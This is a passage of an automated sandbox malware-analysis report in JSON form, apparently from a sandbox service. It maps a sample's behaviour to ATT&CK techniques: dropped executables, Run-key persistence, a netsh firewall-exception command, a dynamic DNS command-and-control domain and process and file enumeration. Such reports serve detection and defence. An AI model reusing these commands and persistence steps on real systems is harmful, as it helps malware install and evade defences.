\"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"GameSDK.exe\" called \"EnumWindows\" (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003972)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-202", "type": 3, "relevance": 3, "name": "Reads system mouse configuration", "description": "\"Stable_Network.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\MOUSE\";)\n \"Stable_Network.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\MOUSE\";)", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"GameSDK.exe\" called \"GetWindowTextA\" (UID: 00000000-00003876)\n \"GameSDK.exe\" called \"GetWindowTextW\" (UID: 00000000-00003876)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.INI (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindFirstFileW\" with parameter C:\\8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.INI (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.INI (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00006040)\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rundl32.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"Stable_Network.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"Stable_Network.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"host.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"Stable_Network.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1241581878\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"Stable_Network.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1241581878\"\n \"cx\": \"16\"\n \"cy\": \"16\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"rundl32.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00006060)\n \"Stable_Network.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00006124)\n \"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003972)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-191", "type": 6, "relevance": 2, "name": "Calls an API typically used to to receive the response to a HTTP requests", "description": "\"Stable_Network.exe\" called \"WinHttpReceiveResponse\" with parameters {\"hRequest\": \"19812d0\"\n \"lpReserved\": \"0\"}", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-190", "type": 6, "relevance": 2, "name": "Calls an API typically used to send the specified request to the HTTP server", "description": "\"Stable_Network.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"19812d0\"\n \"dwHeadersLength\": \"0\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"26653176\"}", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"netsh firewall add allowedprogram \"%ALLUSERSPROFILE%\\\\GameSDK.exe\" \"GameSDK.exe\" ENABLE\" (UID: 00000000-00003972)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-3", "type": 17, "relevance": 5, "name": "Short-term SSL certificate detected", "description": "Short term registered certificate: \"2no.co\" (90 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-52", "type": 7, "relevance": 1, "name": "Contacts Dynamic DNS (possible C&C communication)", "description": "\"microsoft-365-updater.duckdns.org\"", "origin": "Network Traffic", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-54", "type": 7, "relevance": 1, "name": "Making HTTPS connections using secure TLS/SSL version", "description": "Connection was made using TLSv1.2 [tls.handshake.version: 0x0303]", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b\n Observed JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d\n Observed JA3 fingerprint: db95a4cb23548a635a1dfebcee9991cb", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" opened \"\\Device\\KsecDD\"\n \"rundl32.exe\" opened \"\\Device\\KsecDD\"\n \"Stable_Network.exe\" opened \"\\Device\\KsecDD\"\n \"GameSDK.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"\n \"schtasks.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundl32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"rundl32.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")\n \"Stable_Network.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")\n \"GameSDK.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"rundl32.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00006060)\n \"GameSDK.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00003876)\n \"CL_Debug_Log.txt\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00003864)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "External Systems", "identifier": "suricata-0", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain\" (SID: 2022918, Rev: 5, Severity: 3) categorized as \"Misc activity\"", "origin": "Suricata Alerts"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Pattern Matching", "identifier": "yara-51", "type": 13, "relevance": 3, "name": "YARA signature match - Queries video controller using WMI", "description": "YARA signature for WMI query for video controller matched on process \"00000000-00006124\"", "origin": "YARA Signature", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 33280 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rundl32.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 11776 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Stable_Network.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 23040 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\host.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" wrote 52599 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\system.dll.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000400100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"host.exe\" wrote 23040 bytes starting with PE header signature to file \"C:\\ProgramData\\GameSDK.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"GameSDK.exe\" wrote 23040 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\5b4af3576e30808651ae14fbef1ee719.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CL_Debug_Log.txt\" wrote 65532 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\32.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CL_Debug_Log.txt\" wrote 54214 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\64.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"GameSDK.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"5B4AF3576E30808651AE14FBEF1EE719\"; Value: \"\"%ALLUSERSPROFILE%\\GameSDK.exe\" ..\")\n \"GameSDK.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"5B4AF3576E30808651AE14FBEF1EE719\"; Value: \"\"%ALLUSERSPROFILE%\\GameSDK.exe\" ..\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"rundl32.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\rundl32.exe]- [targetUID: 00000000-00006060]\n \"5b4af3576e30808651ae14fbef1ee719.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\5b4af3576e30808651ae14fbef1ee719.exe]- [targetUID: 00000000-00003876]\n \"CL_Debug_Log.txt\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\CL_Debug_Log.txt]- [targetUID: 00000000-00006124]\n \"GameSDK.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%ALLUSERSPROFILE%\\GameSDK.exe]- [targetUID: 00000000-00003876]\n \"host.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\host.exe]- [targetUID: 00000000-00006040]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"CL_Debug_Log.txt\" has section name .text with entropy \"6.70294421351\"\n \"CL_Debug_Log.txt\" has section name .reloc with entropy \"6.18183342576\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"host.exe\" sleeping for \"1566804069\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"Stable_Network.exe\" called 